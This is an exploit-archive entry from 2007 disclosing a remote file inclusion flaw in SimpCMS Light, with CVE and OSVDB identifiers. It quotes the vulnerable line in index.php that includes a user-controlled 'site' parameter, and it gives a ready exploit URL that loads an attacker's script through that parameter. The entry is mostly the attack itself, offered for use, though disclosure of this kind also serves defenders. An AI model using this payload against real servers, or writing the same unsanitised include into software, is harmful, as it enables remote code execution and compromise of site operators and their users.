SimpCMS 04.10.2007 - 'site' Remote File Inclusion
Author: Dr.RoVeR
type: webapps
platform: php
port:
date_added: 2007-04-09
date_updated:
verified: 1
codes: OSVDB-34775;CVE-2007-2009
tags:
aliases:
screenshot_url:
application_url:
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: Dr.RoVeR@HackerMail.CoM
---
Script: SimpCMS Light
Download: http://www.simpcms.com/light/normal/simp-cms-light.zip
--
Bug File: index.php
Bug code in line 31:
include $site.".php";
--
Exploit:
http://site.com/[path]/index.php?site=[EvilScript]
# milw0rm.com [2007-04-10]